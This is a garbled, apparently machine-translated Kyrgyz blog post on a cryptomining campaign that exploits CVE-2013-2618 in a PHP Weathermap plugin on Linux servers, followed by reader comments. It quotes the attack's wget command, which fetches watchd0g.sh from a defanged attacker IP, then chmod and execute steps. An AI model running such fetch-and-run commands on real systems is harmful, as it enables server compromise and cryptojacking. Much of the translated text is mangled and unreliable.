5 жылдык Linux кемчиликтери кол салуучуларга криптовалюталарды казып алууга мүмкүнчүлүк берет

Linux кыйрашы

Бул cryptocurrency казуучу алыскы компьютерлерди колдонуу менен уруксатсыз булардын ээлеринин тенденциясы болуп жатат. Мен буга чейин ушул сыяктуу жагдайлар жөнүндө блогдо бир нече жолу айткан элем.

Жана бул криптовалюталар пайда болгондон баштап, ал толугу менен көзөмөлдөн чыгып кеткен кыйла орунду жана баалуулукту ээлештиКоопсуздугун бузган компьютерлерге кирүү үчүн жетиштүү билими бар адамдар акчалай пайда алуу үчүн маанилүү маалыматтарды же банк эсептерин издөөгө убакытты кетиришти.

Муну жасоонун ордуна, алар эң жөнөкөй нерсени тандашат: бул топторду көзөмөлгө алып, тоо-кен тармагына бириктиришет жана ошондой эле алар көбүнчө ботнет менен аткарган башка иштерди аткарышат.

Ушундай жол менен, адатта, номериңиздин номерин өзгөртүү көбүрөөк болот, алар иштеп жаткан акчага гана көңүл бурушат.

Рыноктук тенденцияларды туура түшүнүү жана крипто-сооданы туура билүү менен, чоң пайда алып келүүгө болот.

Чындыгында Linux коопсуз системабы?

Биздин көпчүлүгүбүз Linux дээрлик кемчиликсиз коопсуз иштөө тутуму деп ойлойбуз, чындыгында анын айрым кемчиликтери бар.

Жакшы барбир нече күн TrendMicro табыш жасадыкайсы аныкталды бир Linux системаларындагы кемчилик, хакерлерге кен казып алуу криптовалютасынын артыкчылыгын берген Linux серверлерин жана машиналарын колдонуу.

Сиздин блог аркылуу билдирүүдө алар төмөнкүлөргө токтолушту:

Окуялардын кесепеттерин жоюу менен байланышкан мониторингибиз аркылуу, биз көрсөткүчтөрү менен мурунку JenkinsMiner зыяндуу программасын колдонгон крипто-валюта казып алуу өнөктүгү менен байланыштыра алган кийлигишүү аракеттерин байкадык.

Айырмасы: бул өнөктүк Linux серверлерине багытталган. Бул ошондой эле, коопсуздуктун эскирген кемчиликтерин колдонуп, кайрадан колдонулган аялуу жерлердин классикалык учуру, бул жамаачы беш жылдан бери иштеп келет.

Сиздин анализ аркылуу ушул чыгарылышта жабыркаган сайттарды аныктоого жетишти бул ийгиликсиздик үчүн көбүнчө Япония, Тайвань, Кытай, АКШ жана Индияга таасир этет.

Чабуул талдоо

Талдоо аркылуу Trend Micro Smart Protection Network тарабынан Чабуулчулар бул кемчиликтен кантип пайдалангандыгы жөнүндө бир аз маалымат:

Бул өнөктүктүн операторлору системанын администраторлору тармактын ишмердүүлүгүн элестетүү үчүн колдонулган Camapi Network Weathermap плагининдеги даталанган CVE-2013-2618 колдонушкан.

Эмне үчүн алар коопсуздуктун эски кемчиликтерин колдонуп жатышат деген суроого токтолсок: Тармактагы Картада 2014-жылдын июнь айынан бери эки гана ачык айкындык бар.

Бул чабуулчулар эксплуатация болгон коопсуздуктун кемчиликтерин гана эмес, ошондой эле ачык булак куралын колдонгон уюмдарда пайда болгон жамаачылык кечигүүсүн да пайдаланып жатышкандыр.

негизги чабуул XSS чабуулу аркылуу:

аба ырайынын картасы-4

Бүдөмүктүү бөлүгү - бул чабуулдун максаты, порту бар веб-сервер.

билэ /plugins/weathermap/configs/conn.php туруктуу XSS чабуулунан келип чыккан файл / плагиндер / weathermap / php .

кошумча Conn.php Башында, окшош HTTP сурамы баракка колдонулганын көрөбүз ' cools.php '.

Cryptocurrency тоо-кен казып алуу программасы аялуу аркылуу бөлүштүрүлөт PHP аба-ырайы картасынан Linux серверлери болгон буталарга

Сүрөттө чабуул кандайча жаралганын көрө аласыз жана ал төмөнкүчө сүрөттөлөт:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Бул эмне, wget менен файлды жүктөө үчүн көрсөтмө жөнөтүү, бул дээрлик бардык Linux таркатуулар орнотулган утилита болуп саналат.

chmod 775 watchd0g.sh

файлды аткарууга болот

./watchd0g.sh

Акыры, файлды серверде иштетүү керек.

Бактыга жараша, буга чейин жамаачы бар ( CVE-2013-2618 ) иштебей калса жана Сиз жүктөп алсаңыз болот чейин Эгер бул шилтеме.

Si сиз ал жөнүндө көбүрөөк билгиңиз келет бул мүчүлүштүктүн бул шилтемесине кире аласыз.

булагы: PHP Weathermap аялдамасы аркылуу таркатылган Cryptocurrency Miner, Linux Serversти максат кылат


Макаланын мазмуну биздин принциптерге карманат редакциялык этика. Ката жөнүндө кабарлоо үчүн чыкылдатыңыз бул жерде.

5 комментарий, өзүңүздүкүн калтырыңыз

Комментарий калтырыңыз

Сиздин электрондук почта дареги жарыяланбайт.

*

*

  1. Маалыматтар үчүн жооптуу: Мигель Анхель Гатан
  2. Маалыматтын максаты: СПАМды көзөмөлдөө, комментарийлерди башкаруу.
  3. Мыйзамдуулук: Сиздин макулдугуңуз
  4. Маалыматтарды берүү: Маалыматтар үчүнчү жактарга юридикалык милдеттенмелерден тышкары билдирилбейт.
  5. Маалыматтарды сактоо: Occentus Networks (ЕС) тарабынан уюштурулган маалыматтар базасы
  6. Укуктар: Каалаган убакта маалыматыңызды чектеп, калыбына келтирип жана жок кыла аласыз.

  1.   Мигель Майол и Тур ал мындай деди:

    Акмак болуу коопсуз эмес, ошого карабастан Linux сизди сактап калат.
    Коопсуздук тактарын жаңыртуу Linuxтун күнөөсү эмес. Күнөө кээ бир компаниялар, акчаны үнөмдөө үчүн, акмактарды тутум администратору катары жалдашат,
    Бирок ошого карабастан, ал тезинен аныкталат жана дароо чечилет, атүгүл ушул сыяктуу коопсуздукка байланыштуу болгон кичинекей окуялар да жарыяланат.

  2.   Мен элдеколетас сыяктуу вилла каалайм ал мындай деди:

    Жана Linuxтун жаңыртуулары колдонулбай жаткандыгында эмне күнөө бар? GNU / Linux иштеп чыгуучулары пайда болгон аялуу жерлерге чечимдерди иштеп чыгуу жана колдонуучуларга жеткиликтүү кылуу менен өз жумуштарын аткарышат. Эгерде дарыгер сасык тумоого каршы дары жазып берсе, сиз аны албай калсаңыз, ооруп, катуу болуп каласыз ... күнөө дарыгердин күнөөсүбү?

  3.   Билл ал мындай деди:

    Linux андай болбогондуктан, эки чоң мүчүлүштүк катары менен эки жаңылык:
    1.- Жакшыраак иштеп чыгуу үчүн редакторлорго акысыз программаны киргизип, башкаларын унутушат (алар комментарийде келтирилген).
    2.- Вирустар ЖАҢЫЛАНБАГАН серверлерге гана таасир эткенде, алар жөнүндө укмуштуу жаңылыктар. Бирок кандайдыр бир Linux ондогон жылдар бою демейки боюнча жаңыланып келсе. Коркунучту Windows стилиндеги соруучу антивирус керек болуп жаткандай сезиш керек. Алар Linuxты Windows менен бирдей деп айтууга аракет кылып жатышат окшойт, андай эмес.
    Эгер мүчүлүштүк эски болсо жана ага жамаачы болсо, бул жаңылык да, эч нерсе деле эмес. Microsoft жана Trend Micro, Norton, Panda же McAffee сыяктуу антивирустук компанияларды ойнотпоңуз же эмгек акы алыңыз.
    Баса, биз компанияда бир нече жылдан бери Trend Micro компаниясын колдонуп келе жатабыз жана бул чыныгы картошка, бок болчу, анткени анын тутумунда аткарылуучу вирустун "издери" бар деп айткан (вирус болсо дагы, вирус болушу мүмкүн) эмес) жана эмне үчүн аны алып салган (аны иштетпеши үчүн каталогго алып барган), анын колдонулушуна жол бербеди жана бул жүрүм-турумду коопсуз аткарылуучу файл менен бөгөттөй турган ак тизмеси жок болчу, биз колдонушубуз керек болчу . Кандай башаламандык. Бул корпоративдик версия болчу, жеке версияда мындай тизме ак тизмеге киргизилген. Аянычтуу.

  4.   Билл ал мындай деди:

    Өзүңүздү ушунчалык көрктүү сүрөттөбөңүз.
    Макалада программаны киргизүүгө, аны аткарууга мүмкүнчүлүк түзүп, иштетүүгө мүмкүндүк берген коопсуздук тешиги жөнүндө сөз болот, бул ар бир вирус таралышы керек болгон коопсуздук тешиги, албетте вирус киргизилген программа өз кодунда болушу керек. иштин кайталанышы жана өзүн өзү көчүрүүсү үчүн тармактардагы компьютерлерди сканерлөө мүмкүнчүлүгү. Алар муну так аткарышпайт, анткени Linuxта ачылган коопсуздук тешиктери коопсуздук патч менен жабылат, ошондуктан мен Windows менен Linuxтун ортосундагы айырмачылыкты айтып жатам, анткени антивирус сөзсүз түрдө эмес, тешикти жабыш үчүн керек. Windowsта бир нече себептерден улам кыйыныраак болот: 1.- Файлдар кеңейтилгенде эле, аткарылуучу файлга айланып, жабыркаган компьютерге киргизүү кадамын жокко чыгарат. 2.- Колдонуучулар келип чыгышы күмөндүү программаларды тынымсыз орнотуп жатышат, анткени алар жеке менчик болгондуктан, аларды төлөбөй туруп алышы керек (MS Office, Photoshop программаларын сатып алуу үй чарбачылыгы үчүн эмне болорун эч нерсе айткан жокмун ... компьютердик техниканын баасы). 3.- Эртеби-кечпи Windows иштей баштайт, колдонуучу аны коңшусуна, досуна алып барат, ... убакытты текке кетирбөө үчүн, бардыгын форматтап, Windows жаңыртылбаган активациялык патч менен орнотот. жамаачы өзү тыңчылык программасын коет. Бул андай эмес болушу мүмкүн жана бул сонун, бирок андай болушу мүмкүн жана Windowsтун паролдорду тыңшоосу бар. Макалада алар Linux тармагындагы алсыздык таасир этүүчү тутум жөнүндө сөз кылышып, тармакты автоматтык түрдө сканерлеп, аны өзү көчүрүп, серверде иштөө үчүн колдонулган программанын баарынан оңой бөлүгү болуп саналат, ошол себептен макала ар кандай вирус үчүн эң маанилүү кадам болуп саналат: тутумдун чабуулдун алсыздыгын билүү.

  5.   hambaglio ал мындай деди:

    Начар маалымат. Бул Linuxтогу мүчүлүштүк эмес, ал PHP КОЛДОНМОСУНДАГЫ мүчүлүштүк, башкача айтканда, мультиплатформалуу. Ал Linux ядросун иштеткен тутумдар үчүн эксклюзивдүү эмес! Бирок тиркеме кросс-платформа болбосо дагы, Linux катасы болбойт, жөн гана тиркеме болмок.

    Linux ядросу ушул сыяктуу сайттар аралык сценарийлердин чабуулунан коргонууга кичине тоскоолдук кылбайт. Жок дегенде Жарыялоодон мурун БЕШ МҮНӨТТҮ изилдеп көрүңүз, анткени бир нерсе жөнүндө бир аз билген адамга сиз жаман көрүнүп каласыз.

bool(чын)